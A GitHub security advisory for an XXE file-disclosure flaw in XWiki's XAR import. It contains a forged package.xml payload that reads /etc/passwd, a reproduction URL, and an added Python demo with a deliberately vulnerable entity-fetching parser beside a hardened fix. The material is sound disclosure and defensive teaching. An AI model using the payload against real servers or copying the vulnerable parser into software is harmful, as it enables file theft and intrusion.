GHSA-gx4f-976g-7g6v

GitHub Security Advisory

XWiki Platform vulnerable to data leak via Improper Restriction of XML External Entity Reference

GitHub Reviewed | Severity: HIGH | Has CVE

Advisory Details

### Impact
Any user with edit rights on a document can trigger a XAR import of a forged XAR file. The `package.xml` descriptor inside the archive is parsed with external entity resolution enabled, so an attacker can declare an entity pointing at a local file and have its content rendered in the import UI: any file readable by the XWiki server process can be disclosed this way.

Example to reproduce:
* Create a forged XAR file whose `package.xml` declares an external entity and references it from the package metadata:
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
...
```
* Upload it onto a wiki page (e.g. `XXE`) as an attachment (e.g. `test.xar`).
* Open the page with the import sheet applied, pointing it at the attachment: `http://localhost:8080/xwiki/bin/view/Main/XXE?sheet=XWiki.AdminImportSheet&file=test.xar`

The import UI then displays the package name and description with the entity expanded, i.e. the content of the `/etc/passwd` file.
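To make the mechanism concrete, here is an added Python example (not code from the advisory or from XWiki) that builds a forged XAR in memory with the `package.xml` above and reads its `<name>` two ways: once with a deliberately lenient parser that fetches external entities, which is the behaviour the advisory exploits, and once with a hardened parser that refuses any DOCTYPE, which is the standard fix for this class of bug (the actual XWiki change is in the linked commit and is not reproduced here). The demo points the entity at a constructed temporary file rather than `/etc/passwd`, and the `<infos>` fields after `<author>` are assumed, since the advisory truncates them.

```python
import io
import os
import tempfile
import urllib.request
import zipfile
import xml.parsers.expat as expat
from pathlib import Path


def forged_package_xml(file_url: str) -> bytes:
    """package.xml carrying the advisory's XXE payload. The target file URL is a
    parameter so the demo can use a constructed file instead of /etc/passwd.
    Fields after <author> are assumed (the advisory truncates the document)."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "{file_url}"> ]>
<package>
<infos>
<name>&xxe;</name>
<description> &xxe; Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
</infos>
</package>
""".encode()


# Constructed benign descriptor, same shape, no DTD.
BENIGN_PACKAGE_XML = b"""<?xml version="1.0" encoding="UTF-8"?>
<package>
<infos>
<name>Helper Pages</name>
<description>Helper pages for creating and listing Class/Template/Sheets</description>
<licence></licence>
<author>XWiki.Admin</author>
</infos>
</package>
"""


def build_xar(package_xml: bytes) -> bytes:
    """A XAR is a zip archive; package.xml is the descriptor the import UI reads.
    A real XAR also carries one XML file per wiki page, omitted here."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("package.xml", package_xml)
    return buf.getvalue()


class DoctypeRejected(ValueError):
    """Raised by the hardened reader when package.xml declares a DTD."""


def read_package_name(xar_bytes: bytes, resolve_external_entities: bool = False) -> str:
    """Return <package><infos><name> from the archive's package.xml.

    Default (hardened): any DOCTYPE is refused, so no entity can be declared.
    resolve_external_entities=True: lenient parser that fetches and splices in
    external entities, which is what makes the advisory's payload work."""
    with zipfile.ZipFile(io.BytesIO(xar_bytes)) as zf:
        data = zf.read("package.xml")

    parser = expat.ParserCreate()
    path: list = []          # element stack, shared with any child parser
    name_parts: list = []    # text collected inside <name>

    def start(tag, _attrs):
        path.append(tag)

    def end(_tag):
        path.pop()

    def chars(text):
        if path == ["package", "infos", "name"]:
            name_parts.append(text)

    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = chars

    if resolve_external_entities:
        def fetch(context, _base, system_id, _public_id):
            # Deliberately vulnerable: fetch whatever URL the DTD names and parse
            # it as entity content. The child parser inherits our handlers, so
            # the file's text is delivered to chars() while inside <name>.
            with urllib.request.urlopen(system_id) as resp:
                child = parser.ExternalEntityParserCreate(context)
                child.Parse(resp.read(), True)
            return 1
        parser.ExternalEntityRefHandler = fetch
    else:
        def refuse(name, _sysid, _pubid, _has_internal_subset):
            raise DoctypeRejected(f"DOCTYPE '{name}' not allowed in package.xml")
        parser.StartDoctypeDeclHandler = refuse

    parser.Parse(data, True)
    return "".join(name_parts).strip()


def demo(secret: bytes = b"root:x:0:0:root:/root:/bin/bash\n") -> dict:
    """Run the advisory's scenario against a constructed secret file."""
    fd, secret_path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "wb") as f:
            f.write(secret)
        xar = build_xar(forged_package_xml(Path(secret_path).as_uri()))
        leaked = read_package_name(xar, resolve_external_entities=True)
        try:
            read_package_name(xar)
            blocked = None
        except DoctypeRejected as e:
            blocked = str(e)
    finally:
        os.unlink(secret_path)
    benign_name = read_package_name(build_xar(BENIGN_PACKAGE_XML))
    return {"leaked": leaked, "blocked": blocked, "benign_name": benign_name}


if __name__ == "__main__":
    print(demo())
```

The lenient path returns the secret file's content as the package name, which is exactly what the import UI rendered in the advisory; the hardened path aborts at the DOCTYPE before any entity is declared, and the benign descriptor still parses normally. Refusing DOCTYPE outright is preferable to only disabling external entities, because it also closes off internal-entity expansion attacks against the same parser.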

### Patches
The vulnerability has been patched in XWiki 13.10.11, 14.4.7 and 14.10-rc-1.

### Workarounds
There is no configuration-only workaround. You need to get the XWiki Platform sources, apply the changes from https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434 to the `XarPackage` Java class, and then either copy the recompiled class into your `WEB-INF/classes` directory (where it shadows the copy in the jar) or rebuild the `xwiki-platform-xar-model` Maven module and replace the jar found in `WEB-INF/lib/`.

### References
* https://github.com/xwiki/xwiki-platform/commit/e3527b98fdd8dc8179c24dc55e662b2c55199434
* https://jira.xwiki.org/browse/XWIKI-20320

### For more information
If you have any questions or comments about this advisory:
* Open an issue in [Jira XWiki.org](https://jira.xwiki.org/)
* Email us at [Security Mailing List](mailto:[email protected])

Affected Packages

Maven org.xwiki.platform:xwiki-platform-xar-model
* >= 1.1-milestone-3, < 13.10.11 (fixed in 13.10.11)
* >= 14.0, < 14.4.7 (fixed in 14.4.7)
* >= 14.5, < 14.10-rc-1 (fixed in 14.10-rc-1)

Key Information

GHSA ID
GHSA-gx4f-976g-7g6v
Published
March 8, 2023 5:19 PM
Last Modified
March 8, 2023 5:19 PM
CVSS Score
7.5 / 10
Primary Ecosystem
Maven
Primary Package
org.xwiki.platform:xwiki-platform-xar-model
GitHub Reviewed
✓ Yes

Dataset

Last updated: September 22, 2025 6:29 AM

Data from GitHub Advisory Database. This information is provided for research and educational purposes.